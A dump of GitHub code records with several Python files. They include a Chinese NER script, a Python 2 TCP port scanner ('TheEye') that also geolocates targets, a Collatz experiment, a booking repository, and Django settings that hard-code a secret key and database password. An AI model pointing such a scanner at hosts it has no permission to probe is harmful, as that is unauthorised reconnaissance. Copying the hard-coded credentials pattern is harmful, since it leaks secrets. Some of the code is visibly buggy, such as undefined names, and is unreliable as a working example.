I-LOC\\n')\n elif n == 'S-Ni' or n == 'B-Ni':\n f.write(w[0] + ' B-ORG\\n')\n for i in range(len(w)):\n if (i == 0):\n continue\n f.write(w[i] + ' I-ORG\\n')\n elif n == 'I-Ns' or n == 'E-Ns':\n for i in range(len(w)):\n f.write(w[i] + ' I-ORG\\n')\n\nprint ('done.')\n\nreadfile = open('./data/output_news2.txt', 'r', encoding='utf-8').readlines()\ncharlist = []\ntaglist = []\nfor line in readfile:\n line.strip('\\r\\n')\n line.replace('\\n','')\n line = line.split(' ')\n charlist.append(line[0])\n taglist.append(line[1][:-1])\n\ndef get_PER_entity(tag_seq, char_seq):\n length = len(char_seq)\n PER = []\n for i, (char,tag) in enumerate(zip(char_seq, tag_seq)):\n if tag == 'B-PER':\n if 'per' in locals().keys():\n PER.append(per)\n del per\n per = char\n if i+1 == length:\n PER.append(per)\n if tag == 'I-PER':\n per += char\n if i+1 == length:\n PER.append(per)\n if tag not in ['I-PER','B-PER']:\n if 'per' in locals().keys():\n PER.append(per)\n del per\n continue\n return PER\n\ndef get_LOC_entity(tag_seq, char_seq):\n #print (tag_seq, char_seq)\n length = len(char_seq)\n LOC = []\n for i, (char, tag) in enumerate(zip(char_seq, tag_seq)):\n if tag == 'B-LOC':\n if 'loc' in locals().keys():\n LOC.append(loc)\n del loc\n loc = char\n if i+1 == length:\n LOC.append(loc)\n if tag == 'I-LOC':\n loc += char\n if i+1 == length:\n LOC.append(loc)\n if tag not in ['I-LOC', 'B-LOC']:\n if 'loc' in locals().keys():\n LOC.append(loc)\n del loc\n continue\n return LOC\n\n\ndef get_ORG_entity(tag_seq, char_seq):\n length = len(char_seq)\n ORG = []\n for i, (char, tag) in enumerate(zip(char_seq, tag_seq)):\n if tag == 'B-ORG':\n if 'org' in locals().keys():\n ORG.append(org)\n del org\n org = char\n if i+1 == length:\n ORG.append(org)\n if tag == 'I-ORG':\n org += char\n if i+1 == length:\n ORG.append(org)\n if tag not in ['I-ORG', 'B-ORG']:\n if 'org' in locals().keys():\n ORG.append(org)\n del org\n continue\n return ORG\n\ndef get_entity(tag_seq, char_seq):\n PER = get_PER_entity(tag_seq, char_seq)\n LOC = get_LOC_entity(tag_seq, char_seq)\n ORG = get_ORG_entity(tag_seq, char_seq)\n return PER, LOC, ORG\n\nwith open('./data/entity_new.txt', 'w', encoding='utf-8') as f:\n PER, LOC, ORG = get_entity(taglist, charlist)\n print ('PER: {}\\nLOC: {}\\nORG:{}'.format(PER,LOC,ORG))\n f.write ('PER: {}\\nLOC: {}\\nORG:{}'.format(PER,LOC,ORG))\n\nprint ('done.')\n\n","repo_name":"NewNoobBird/ChineseNER","sub_path":"LTP/ltp.py","file_name":"ltp.py","file_ext":"py","file_size_in_byte":6100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12415479304","text":"#!/usr/bin/python2\n# Created ybenel \n\nimport optparse\nimport socket,datetime\nfrom time import sleep\nfrom os import system as sy\ntry:\n import json\nexcept:\n print(\"[!] Error [ Json ] Is Not Exist !!!\\n[*] Please Install It Using This Command: pip2 install simplejson\")\n exit(1)\ntry:\n import urllib2\nexcept KeyboardInterrupt:\n pass\nexcept:\n print(\"[!] Error [ Urllib2 ] Is Not Exist !!!\\n[*] Please reinstall your python, because it comes with python\")\n exit(1)\n\n####################\nwi='\\033[1;37m'\nrd='\\033[1;31m'\ngr='\\033[1;32m'\nyl='\\033[1;33m'\npu='\\033[1;35m'\ncy='\\033[1;36m'\nGreen=\"\\033[1;33m\"\nBlue=\"\\033[1;34m\"\nGrey=\"\\033[1;30m\"\nReset=\"\\033[0m\"\nyellow=\"\\033[1;36m\"\nRed=\"\\033[1;31m\"\npurple=\"\\033[35m\"\nLight=\"\\033[95m\"\ncyan=\"\\033[96m\"\nstong=\"\\033[39m\"\nunknown=\"\\033[38;5;82m\"\nunknown2=\"\\033[38;5;198m\"\nunknown3=\"\\033[38;5;208m\"\nunknown4=\"\\033[38;5;167m\"\nunknown5=\"\\033[38;5;91m\"\nunknown6=\"\\033[38;5;210m\"\nunknown7=\"\\033[38;5;165m\"\nunknown8=\"\\033[38;5;49m\"\nunknown9=\"\\033[38;5;160m\"\nunknown10=\"\\033[38;5;51m\"\nunknown11=\"\\033[38;5;13m\"\nunknown12=\"\\033[38;5;162m\"\nunknown13=\"\\033[38;5;203m\"\nunknown14=\"\\033[38;5;113m\"\nunknown15=\"\\033[38;5;14m\"\n####################\n\n\n\n#############time####################\n #\nmytime = datetime.datetime.now() #\nhour = mytime.hour #\nmin = mytime.minute #\nsec = mytime.second #######\ntimenow = \"{}:{}:{}\".format(hour,min,sec) #\n###########################################\n\n\n### CHECK INTERNET ######################################\n #\nserver = \"www.google.com\" #\n #\ndef check(): #\n try: #\n host = socket.gethostbyname(server) #\n conn = socket.create_connection((host, 80), 2) #\n return True #\n except: #\n pass #\n return False #\nchecknet1 = check() #\nchecknet2 = checknet1 #\nchecknet3 = checknet2 #\n #\n################ DONE!###################################\n\ndef msgerror():\n print(rd + \"\\n[!]:Ops:\"+yl+\"You Not Connected To [\"+rd+\" INTERNET\"+yl+\" ]\"+Blue+\"\\n[*]\"+gr+\":\"+wi+\"Please Connect To [ \"+rd+\"INTERNET\"+wi+\" ] And Try Again \"+rd+\":)\")\n exit()\n\n##########################################=>>OPTIONS<<=###########################################\nprint(\" \"+Green+\"MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM\")\nprint(\" \"+Blue+\"MMMMMMMMMMNKWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM\")\nprint(\" \"+Grey+\"MMMMMMMMMNc.dWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM\")\nprint(\" \"+Reset+\"MMMMMMMMWd. .kWMMMMMMMMMMMMMMMMMMMMMMW0KMMMMMMMMMM\")\nprint(\" \"+yellow+\"MMMMMMMMk:;. 'OMMMMMMMMMMMMMMMMMMMMMWx.,0MMMMMMMMM\")\nprint(\" \"+Red+\"MMMMMMMK:ok. ,0MMMMMMMMMMMMMMMMMMMWO. .cXMMMMMMMM\")\nprint(\" \"+purple+\"MMMMMMNl:KO. ;KWNXK00O0000KXNWMMWO' .c;dWMMMMMMM\")\nprint(\" \"+Light+\"MMMMMMx,xNk. .;'... ....';:l:. ,0l,0MMMMMMM\")\nprint(\" \"+cyan+\"MMMMMK;,l;. .,:cc:;. .dx,lWMMMMMM\")\nprint(\" \"+stong+\"MMMMWo ,dKWMMMMWXk:. .cdkOOxo,. ...OMMMMMM\")\nprint(\" \"+unknown+\"MMMM0' cXMMWKxood0WWk. .lkONMMNOOXO, lWMMMMM\")\nprint(\" \"+unknown2+\"MMMWl ;XMMNo. .lXWd. .dWk;;dd;;kWM0' '0MMMMM\")\nprint(\" \"+unknown3+\"kxko. lWMMO. .kMO. .OMMK; .kMMMNc oWMMMM\")\nprint(\" \"+unknown4+\"X0k:. ;KMMXc :XWo .dW0c,lo;;xNMK, 'xkkk0\")\nprint(\" \"+unknown5+\"kko' :KMMNkl::lkNNd. .dkdKWMNOkXO, .lOKNW\")\nprint(\" \"+unknown6+\"0Kk:. .lOXWMMWN0d, 'lxO0Oko;. .ckkOO\")\nprint(\" \"+unknown7+\"kkkdodo;. .,;;;'. .:ooc. . ...ck0XN\")\nprint(\" \"+unknown8+\"0XWMMMMWKxc'. ;dxc. .,cxKK0OkkOO\")\nprint(\" \"+unknown9+\"MMMMMMMMMMMN0d:'. .' .l' .;lxKWMMMMMMMMMN\")\nprint(\" \"+unknown10+\"MMMMMMMMMMMMMMMN0xo0O:,;;;;;;xN0xOXWMMMMMMMMMMMMMM\")\nprint(\" \"+unknown11+\"MMMMMMMMMMMMMMMMMMMMMMWWWWWMMMMMMMMMMMMMMMMMMMMMMM\")\nprint(\" \"+unknown12+\"MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM\")\nprint(\" \"+unknown13+\"MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM\")\nprint(\" \"+unknown14+\"MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM\")\nprint(\" \"+unknown15+\"MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM\")\nprint(\" \"+Blue+\" \"+unknown+\"[\"+unknown15+\"TheEye\"+unknown+\"]\"+unknown+\" \")\nprint(\" \"+purple+\" \"+unknown+\"[\"+unknown9+\" Created By ybenel\"+unknown+\"]\"+unknown+\" \"+Reset+\"\\n\")\nparse = optparse.OptionParser(unknown10+\"\"\"\\\n\n[$] [$]\n +=====================================================================+\n |> USAGE: python2 ./TheEye.py -S [OPTIONS...] <|\n +=====================================================================+\n | |\n | >OPTIONS<: |\n +=====================================================================+\n | |\n | -O ::> SCAN [SINGLE] PORT |\n | -M ::> SCAN [MANY] PORTS |\n | -R ::> [RANGE] PORTS |\n | -T ::> Set Timeout For Connection close |\n | |\n | >EXAMPLES<: |\n +=====================================================================+\n | |\n | TheEye -S www.google.com -O 80 |\n | TheEye -S 192.168.1.1 -M 80,443,21,22,23,25,53 |\n | TheEye -S www.fb.com -R 1-1000 |\n | |\n | TheEye --server 192.168.1.121 --one-port 80 --timeout 10 |\n | TheEye -s www.google.com -m 21,22,23,80,443 -t 10 |\n | (Hack_The_Planet) |\n +=====================================================================+\n[$] [$]\n\"\"\",version='TheEye Version: 1.0')\n################################### DONE! #######################################################\n\n###################### MAKE MAIN AND FUNCTION #######################################\n\ndef main():\n parse.add_option(\"-S\",\"-s\",\"--server\",'--SERVER',dest=\"TARGET\",type=\"string\")\n parse.add_option(\"-O\",\"-o\",\"--one-port\",'--ONE-PORT',dest=\"Oport\",type=\"string\")\n parse.add_option(\"-M\",\"-m\",\"--many-port\",'--MANY-PORT',dest=\"Mport\",type=\"string\")\n parse.add_option(\"-R\",\"-r\",\"--range-port\",'--RANGE-PORT',dest=\"Rport\",type=\"string\")\n parse.add_option(\"-T\",\"-t\",\"--timeout\",'--TIMEOUT',dest=\"timeout\",type=\"string\")\n parse.add_option(\"-V\",\"-v\",'--VERSION',action=\"store_true\",dest=\"version\",default=False)\n (options,args) = parse.parse_args()\n if options.version:\n print(\"SpyPorte Version: 2.5\")\n elif options.TARGET !=None and options.Oport !=None:\n target = options.TARGET\n port = options.Oport\n if int(port) < 0 or int(port) > 65535:\n print(rd+\"\\n[\"+yl+\"!\"+rd+\"]\"+yl+\" Error: Invalid PORT[ \"+wi+str(port)+yl+\" ]\\n\"+rd+\"[\"+yl+\"!\"+rd+\"]\"+yl+\" Must Be Between [ \"+wi+\"0 \"+yl+\"&\"+wi+\" 65535\"+yl+\" ]\")\n exit(1)\n def servername():\n try:\n ser = socket.getservbyport(int(port))\n return ser\n except OSError:\n return \"TCP\"\n except socket.error:\n return \"TCP\"\n servername = servername()\n global checknet1\n if target ==\"127.0.0.1\":\n checknet1 = True\n\n if checknet1 == True:\n def checkser():\n if target !=\"127.0.0.1\":\n try:\n ip = socket.gethostbyname(target)\n return True\n except:\n pass\n return False\n else:\n return True\n if checkser() !=True:\n print(yl+\"\\n[!]:\"+rd+\"Error:[\"+yl+\"404\"+rd+\"]\"+wi+\" SERVER Not Found\"+rd+\"!!\")\n exit(1)\n try:\n ip = socket.gethostbyname(target)\n print(unknown2+\"\\n[*]:method: SINGLE-PORT=> [ {} ]\".format(port))\n sleep(1.8)\n print(unknown8+\"[>]:ServerIP: {}\".format(ip))\n try:\n url = \"http://ip-api.com/json/\"\n reponse = urllib2.urlopen(url + str(ip) )\n name = reponse.read()\n labs = json.loads(name)\n test = labs['regionName']\n print(rd+\"INFO\"+gr+\":[\"+wi+str(ip)+gr+\"]===:\")\n sleep(0.10)\n print(gr + \"\\t\\t IP: \" +stong+ labs['query'])\n sleep(0.10)\n print(gr+ \"\\t\\t Status: \" +unknown+ labs['status'])\n sleep(0.10)\n print(gr+ \"\\t\\t Region: \" +unknown5+ test)\n sleep(0.10)\n print(gr + \"\\t\\t Country: \" +unknown3+ labs['country'])\n sleep(0.10)\n print(gr + \"\\t\\t City: \" +unknown6+ labs['city'])\n sleep(0.10)\n print(gr + \"\\t\\t ISP: \"+unknown2 + labs['isp'])\n sleep(0.10)\n print(gr + \"\\t\\t Lat,Lon: \"+unknown4 + str(labs['lat']) + \",\" + str(labs['lon']))\n sleep(0.10)\n print(gr + \"\\t\\t ZIPCODE: \"+unknown12 + labs['zip'])\n sleep(0.10)\n print(gr + \"\\t\\t TimeZone: \" +unknown11 + labs['timezone'])\n sleep(0.10)\n print(gr + \"\\t\\t AS: \" +unknown15 + labs['as'])\n sleep(0.10)\n print(pu+\"===============================\\n\"+wi)\n except:\n pass\n sleep(0.60)\n print(purple+\"[$]:Start At: {}\".format(timenow))\n sleep(0.60)\n print(Blue+\"[#]:Checking.......\")\n sleep(1.5)\n con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n if options.timeout !=None:\n timeout = options.timeout\n con.settimeout(int(timeout))\n else:\n con.settimeout(5)\n con.connect((ip,int(port)))\n print(bl + \"\\n[+]\"+gr+\":\"+wi+\"PORT[\"+gr+str(port)+wi+\"/\"+cy+servername+wi+\"] <=\"+gr+\"OPEN\"+wi+\"=>\")\n except KeyboardInterrupt:\n print(rd+\"[CTRL+C]:\"+yl+\"Exiting\"+rd+\".....\")\n sleep(2.5)\n exit()\n except socket.error:\n print(rd+\"\\n[-]\"+wi+\":PORT[\"+rd+str(port)+wi+\"/\"+yl+servername+wi+\"] <=\"+rd+\"CLOSE!\"+wi+\"=>\")\n except:\n print(rd+\"\\n[!]\"+yl+\"[ERROR] Something Went Wrong...\"+gr+\"Try Again :)\")\n exit(1)\n print(gr+\"---------------------------------\\n[$]\"+unknown7+\" Shutdown At: {}\".format(timenow))\n else:\n msgerror()\n\n elif options.TARGET !=None and options.Mport !=None:\n target = options.TARGET\n port = options.Mport\n if \",\" in port:\n ports = port.split(\",\")\n else:\n print(rd+\"\\n[!]\"+yl+\"[ERROR] Please Use\"+gr+\" [\"+yl+\" , \"+gr+\"]\"+yl+\" For Distinguish Ports\"+gr+\" Ex: \"+yl+\"22,80,23,25,135,445,21\")\n exit(1)\n global checknet2\n if target ==\"127.0.0.1\":\n checknet2 = True\n\n if checknet2 == True:\n def checkser():\n if target !=\"127.0.0.1\":\n try:\n ip = socket.gethostbyname(target)\n return True\n except:\n pass\n return False\n else:\n return True\n if checkser() !=True:\n print(yl+\"\\n[!]:\"+rd+\"Error:[\"+yl+\"404\"+rd+\"]\"+wi+\" SERVER Not Found\"+rd+\"!!\")\n exit(1)\n\n\n ip = socket.gethostbyname(target)\n print(unknown2+\"\\n[*]:method: MANY-PORT=> [ {} ]\".format(port))\n sleep(1.8)\n print(unknown8+\"[>]:ServerIP: {}\".format(ip))\n try:\n url = \"http://ip-api.com/json/\"\n reponse = urllib2.urlopen(url + str(ip) )\n name = reponse.read()\n labs = json.loads(name)\n test = labs['regionName']\n print(rd+\"INFO\"+gr+\":[\"+wi+str(ip)+gr+\"]===:\")\n sleep(0.10)\n print(gr + \"\\t\\t IP: \" +stong+ labs['query'])\n sleep(0.10)\n print(gr+ \"\\t\\t Status: \" +unknown+ labs['status'])\n sleep(0.10)\n print(gr+ \"\\t\\t Region: \" +unknown5+ test)\n sleep(0.10)\n print(gr + \"\\t\\t Country: \" +unknown3+ labs['country'])\n sleep(0.10)\n print(gr + \"\\t\\t City: \" +unknown6+ labs['city'])\n sleep(0.10)\n print(gr + \"\\t\\t ISP: \"+unknown2 + labs['isp'])\n sleep(0.10)\n print(gr + \"\\t\\t Lat,Lon: \"+unknown4 + str(labs['lat']) + \",\" + str(labs['lon']))\n sleep(0.10)\n print(gr + \"\\t\\t ZIPCODE: \"+unknown12 + labs['zip'])\n sleep(0.10)\n print(gr + \"\\t\\t TimeZone: \" +unknown11+ labs['timezone'])\n sleep(0.10)\n print(gr + \"\\t\\t AS: \" +unknown15+ labs['as'])\n sleep(0.10)\n print(pu+\"===============================\\n\"+wi)\n except:\n pass\n sleep(0.60)\n print(purple+\"[$]:Start At: {}\".format(timenow))\n sleep(0.60)\n print(Blue+\"[#]:Checking.......\")\n sleep(1.5)\n for p in ports:\n try:\n servername = socket.getservbyport(int(p))\n except socket.error:\n servername = \"TCP\"\n except OSError:\n servername = \"TCP\"\n try:\n con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n if options.timeout !=None:\n timeout = options.timeout\n con.settimeout(int(timeout))\n else:\n con.settimeout(5)\n con.connect((ip,int(p)))\n print(bl + \"\\n[+]\"+gr+\":\"+wi+\"PORT[\"+gr+str(p)+wi+\"/\"+cy+servername+wi+\"]\"+wi+\" <=\"+gr+\"OPEN\"+wi+\"=>\")\n except KeyboardInterrupt:\n print(rd+\"[CTRL+C]:\"+yl+\"Exiting\"+rd+\".....\")\n sleep(2.5)\n break\n except socket.error:\n print(rd+\"\\n[-]\"+wi+\":PORT[\"+rd+str(p)+wi+\"/\"+yl+servername+wi+\"] <=\"+rd+\"CLOSE!\"+wi+\"=>\")\n except:\n print(rd+\"\\n[!]\"+yl+\"[ERROR] Something Went Wrong\"+rd+\" !!!\")\n print(gr+\"---------------------------------\\n[$]\"+unknown7+\" Shutdown At: {}\".format(timenow))\n\n else:\n msgerror()\n\n elif options.TARGET !=None and options.Rport !=None:\n target = options.TARGET\n port = options.Rport\n if \"-\" in port:\n ports = port.split(\"-\")\n if int(ports[0]) > int(ports[1]):\n print(rd+\"\\n[!] \"+yl+\"Wrong,The First Range Port\"+gr+\"[\"+rd+str(ports[0])+gr+\"]\"+yl+\" Is Bigger Than Last Range Port\"+gr+\"[\"+rd+str(ports[1])+gr+\"]\"+rd+\" !!!\")\n exit(1)\n elif int(ports[0]) > 65535 or int(ports[1]) > 65535:\n print(rd+\"\\n[\"+yl+\"!\"+rd+\"]\"+yl+\" Error: Invalid Range-PORT[ \"+wi+str(ports)+yl+\" ]\\n\"+rd+\"[\"+yl+\"!\"+rd+\"]\"+yl+\" Must be between [ \"+wi+\"0 \"+yl+\"&\"+wi+\" 65535\"+yl+\" ]\")\n exit(1)\n else:\n print(rd+\"\\n[!]\"+yl+\"[ERROR] Please Use\"+gr+\" [\"+yl+\" - \"+gr+\"]\"+yl+\" For Distinguish First Range to Last Range Ports \"+gr+\"Ex: \"+yl+\"1-50\")\n exit(1)\n global checknet3\n if target ==\"127.0.0.1\":\n checknet3 = True\n\n if checknet3 == True:\n def checkser():\n if target !=\"127.0.0.1\":\n try:\n ip = socket.gethostbyname(target)\n return True\n except:\n pass\n return False\n else:\n return True\n if checkser() !=True:\n print(yl+\"\\n[!]:\"+rd+\"Error:[\"+yl+\"404\"+rd+\"]\"+wi+\" SERVER Not Found\"+rd+\"!!\")\n exit(1)\n ip = socket.gethostbyname(target)\n print(unknown2+\"\\n[*]:method: RANGE-PORT=> [ {} ]\".format(port))\n sleep(1.8)\n print(unknown8+\"[>]:ServerIP: {}\".format(ip))\n try:\n url = \"http://ip-api.com/json/\"\n reponse = urllib2.urlopen(url + str(ip) )\n name = reponse.read()\n labs = json.loads(name)\n test = labs['regionName']\n print(rd+\"INFO\"+gr+\":[\"+wi+str(ip)+gr+\"]===:\")\n sleep(0.10)\n print(gr + \"\\t\\t IP: \" +stong+ labs['query'])\n sleep(0.10)\n print(gr+ \"\\t\\t Status: \" +unknown+ labs['status'])\n sleep(0.10)\n print(gr+ \"\\t\\t Region: \" +unknown5+ test)\n sleep(0.10)\n print(gr + \"\\t\\t Country: \" +unknown3+ labs['country'])\n sleep(0.10)\n print(gr + \"\\t\\t City: \" +unknown6+ labs['city'])\n sleep(0.10)\n print(gr + \"\\t\\t ISP: \"+unknown2 + labs['isp'])\n sleep(0.10)\n print(gr + \"\\t\\t Lat,Lon: \"+unknown4 + str(labs['lat']) + \",\" + str(labs['lon']))\n sleep(0.10)\n print(gr + \"\\t\\t ZIPCODE: \"+unknown12 + labs['zip'])\n sleep(0.10)\n print(gr + \"\\t\\t TimeZone: \" +unknown11+ labs['timezone'])\n sleep(0.10)\n print(gr + \"\\t\\t AS: \" +unknown15+ labs['as'])\n sleep(0.10)\n print(pu+\"===============================\\n\"+wi)\n except:\n pass\n sleep(0.60)\n print(purple+\"[$]:Start At: {}\".format(timenow))\n sleep(0.60)\n print(Blue+\"[#]:Checking.......\")\n sleep(1.5)\n found = []\n try:\n for p in xrange( int(ports[0]) , int(ports[1])+1):\n try:\n servername = socket.getservbyport(int(p))\n except socket.error:\n servername = \"TCP\"\n except OSError:\n servername = \"TCP\"\n try:\n con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n if options.timeout !=None:\n timeout = options.timeout\n con.settimeout(int(timeout))\n else:\n con.settimeout(0.05)\n con.connect((ip,int(p)))\n print(bl + \"\\n[+]\"+gr+\":\"+wi+\"PORT[\"+gr+str(p)+wi+\"/\"+cy+servername+wi+\"] <=\"+gr+\"OPEN\"+wi+\"=>\")\n found.append(p)\n except KeyboardInterrupt:\n print(rd+\"[CTRL+C]:\"+yl+\"Exiting\"+rd+\".....\")\n sleep(2.5)\n if len(found) > 0:\n print(gr+\"\\n[\"+cy+\"*\"+gr+\"]\"+wi+\" OPEN PORT(s) \"+gr+\"Found!\\n-----------------------------\")\n loop =1\n for i in found:\n try:\n servername = socket.getservbyport(int(i))\n except socket.error:\n servername = \"TCP\"\n except OSError:\n servername = \"TCP\"\n print(gr+\"\\t[\"+wi+str(loop)+gr+\"] \"+yl+ip+wi+\":\"+gr+str(i)+wi+\"/\"+cy+servername+wi+\" STATUS:[ \"+gr+\"OPEN\"+wi+\" ]\")\n loop +=1\n exit(1)\n\n except socket.error:\n print(rd+\"\\n[-]\"+wi+\":PORT[\"+rd+str(p)+wi+\"/\"+yl+servername+wi+\"] <=\"+rd+\"CLOSE!\"+wi+\"=>\")\n except:\n print(rd+\"\\n[!]\"+yl+\"[ERROR] Something Went Wrong \"+rd+\"!!!\")\n\n if len(found) > 0:\n print(rd+\"---------------------------------\\n[#]\"+gr+\" Result\"+rd+\" [#]\\n\")\n print(gr+\"[*] \"+wi+\"TARGET:\"+bl+\" {}\\n\".format(target)+gr+\"[*]\"+wi+\" OPEN PORT(s) \"+gr+\"Found!\\n-----------------------------\")\n loop =1\n for i in found:\n try:\n servername = socket.getservbyport(int(i))\n except socket.error:\n servername = \"TCP\"\n except OSError:\n servername = \"TCP\"\n print(gr+\"\\t[\"+wi+str(loop)+gr+\"] \"+yl+ip+wi+\":\"+gr+str(i)+wi+\"/\"+cy+servername+wi+\" STATUS:[ \"+gr+\"OPEN\"+wi+\" ]\")\n loop +=1\n print(gr+\"\\n[$]\"+unknown7+\" Shutdown At: {}\".format(timenow))\n else:\n print(gr+\"---------------------------------\\n[#]\"+rd+\" Result\"+gr+\" [#]\\n\")\n print(gr+\"[*] \"+wi+\"TARGET:\"+yl+\" {}\\n\".format(target)+wi+\"[\"+rd+\"!\"+yl+\"] OPEN PORT(s):\"+rd+\" No Open Port(s) Found !! :(\")\n print(gr+\"[$]\"+unknown7+\" Shutdown At: {}\".format(timenow))\n exit(1)\n\n except KeyboardInterrupt:\n print(rd+\"\\n[CTRL+C]:\"+yl+\"Exiting\"+rd+\".....\")\n sleep(2.5)\n if len(found) > 0:\n print(gr+\"\\n[\"+cy+\"*\"+gr+\"]\"+wi+\" OPEN PORT(s) \"+gr+\"Found!\\n-----------------------------\")\n loop = 1\n for i in found:\n try:\n servername = socket.getservbyport(int(i))\n except socket.error:\n servername = \"TCP\"\n except OSError:\n servername = \"TCP\"\n print(gr+\"\\t[\"+wi+str(loop)+gr+\"] \"+yl+ip+wi+\":\"+gr+str(i)+wi+\"/\"+cy+servername+wi+\" STATUS:[ \"+gr+\"OPEN\"+wi+\" ]\")\n loop+=1\n exit(1)\n\n else:\n msgerror()\n else:\n\n print(parse.usage)\n exit(1)\n\nif __name__==\"__main__\":\n main()\n#'='!!\n","repo_name":"M1ndo/TheEye","sub_path":"TheEye.py","file_name":"TheEye.py","file_ext":"py","file_size_in_byte":22774,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"} +{"seq_id":"16145774936","text":"\ndef collatz(x):\n while x > 1:\n if x % 2 == 0:\n x = x // 2\n else:\n x = 3 * x + 1\n yield x\n\n\ndef test_last_digits():\n\n mapping = {}\n tail_edge_hist = ub.ddict(lambda: 0)\n\n for x in ub.ProgIter(range(1, int(1e5))):\n import ubelt as ub\n for y in collatz(x):\n if x in mapping:\n break\n x_tail = x - (10 * (x // 10))\n y_tail = y - (10 * (y // 10))\n mapping[x] = y\n tail_edge_hist[(str(x_tail), str(y_tail))] += 1\n x = y\n\n import kwarray\n print(kwarray.stats_dict(np.array(list(tail_edge_hist.values()))))\n\n import networkx as nx\n tail_g = nx.DiGraph()\n tail_g.add_edges_from(tail_edge_hist.keys())\n\n for cycle in nx.simple_cycles(tail_g):\n print('cycle = {!r}'.format(cycle))\n\n\n print('tail_g.adj = {!r}'.format(tail_g.adj))\n\n for n in sorted(tail_g.nodes, key=int):\n pred = tuple(tail_g.pred[n].keys())\n succ = tuple(tail_g.succ[n].keys())\n in_d = tail_g.in_degree(n)\n out_d = tail_g.out_degree(n)\n print(f'{str(pred):>15} -> {n:>2} -> {str(succ):<15} : {out_d:<2} {in_d:<2}')\n\n import kwplot\n import graphid\n plt = kwplot.autoplt()\n sccs = list(nx.strongly_connected_components(tail_g))\n nx.draw_networkx(tail_g)\n # nx.draw_circular(tail_g)\n\n ax = plt.gca()\n ax.cla()\n # nx.draw_networkx(tail_g)\n graphid.util.util_graphviz.show_nx(tail_g)\n\n\n CCs = list(nx.connected_components(tail_g.to_undirected()))\n\n","repo_name":"Erotemic/misc","sub_path":"learn/collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"83"} +{"seq_id":"7387780622","text":"from db.run_sql import run_sql\n\nfrom models.customer import Customer\nfrom models.session import Session\nfrom models.booking import Booking\n\nimport repositories.customer_repository as customer_repository\nimport repositories.session_repository as session_repository\n\n# Save a new booking\ndef save(booking):\n sql = 'INSERT INTO bookings(customer_id, session_id) VALUES ( %s, %s) RETURNING id'\n values = [booking.customer.id, booking.session.id]\n results = run_sql( sql, values)\n booking.id = results[0]['id']\n return booking\n\n# Selects all bookings\ndef select_all():\n bookings = []\n sql = 'SELECT * FROM bookings'\n results = run_sql(sql)\n for row in results:\n customer = customer_repository.select(row['customer_id'])\n session = session_repository.select(row['session_id'])\n booking = Booking(customer, session, row['id'])\n bookings.append(booking)\n return bookings\n\n# Selects a singular booking based on booking id\ndef select(id):\n booking = None\n sql = 'SELECT * FROM bookings WHERE id = %s'\n values = [id]\n result = run_sql(sql, values)[0]\n if result != None:\n booking = Booking(result['customer'], result['session'], result['id'])\n return booking\n\n# Delete all bookings, currently only used by console.py\ndef delete_all():\n sql = 'DELETE FROM bookings'\n run_sql(sql)\n\n# Delete one booking\ndef delete(id):\n sql = 'DELETE FROM bookings WHERE id = %s'\n values = [id]\n run_sql(sql, values)\n\ndef duplicate_check(new_booking):\n bookings = select_all()\n for booking in bookings:\n if booking.customer.id == new_booking.customer.id and booking.session.id == new_booking.session.id: \n return True\n return False","repo_name":"MozzBuilds/Resistance-Temple","sub_path":"repositories/booking_repository.py","file_name":"booking_repository.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"28129423742","text":"# Local server settings - unsuitable for production. Use these settings\n# when you are testing on your personal computer and are making rapid,\n# potentially fatal changes and testing new ideas. This is optimized to run\n# in a Qiime 1.90 virtual machine with a Redis message queue setup in the host\n# machine and a local installation of mysql with the microbiome database\n\nfrom vzb.settings.base import *\n\n# SECURITY WARNING: keep the secret key used in production secret! It's okay\n# here for now\nSECRET_KEY = 'k&9nph7dp%1v1_e0t@()=fbs*vl2*i0=r2hdt-m)c#&nt2^yh*'\n\n# I want to see debug messages when developing stuff on my computer. Turning the\n# flag to False requires you to setup the static files path and media path.\n# Maybe keep it like this until you know what you're doing.\nDEBUG = True\n\n# Allowed hosts can be empty since we're only serving locally to our computer\nALLOWED_HOSTS = []\n\n# Log to console for local servers, easier to immediately see errors\nLOGGING = {\n 'version': 1,\n 'handlers': {\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n }\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n 'propagate': True,\n }\n }\n}\n\n# Use sqlite3 since it's easier to refresh and manage if problem occurs\n# database should be located at visibiome/db.sqlite3\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': 'db.sqlite3',\n 'USER': '',\n },\n # Microbiome Database configuration. This database is not handled by\n # Django due to legacy reasons so no engine configuration needed.\n 'microbiome': {\n 'NAME': 'EarthMicroBiome',\n # Currently it's pointing to the old microbiome sevrer in an EC2\n 'HOST': 'localhost',\n 'USER': 'root',\n # Consider placing the password in an environment variable for\n # production\n 'PASSWORD': 'qiime',\n }\n}\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.8/howto/static-files/\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 'local/mediafiles/')\n# Static files are handled by whitenoise and hence doesn't need Apache's\n# permissions. This reduces dependencies and configuration\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'app/static/')\n\n# The 10K matrix path. This is placed wherever you want as long as it is\n# readable by the 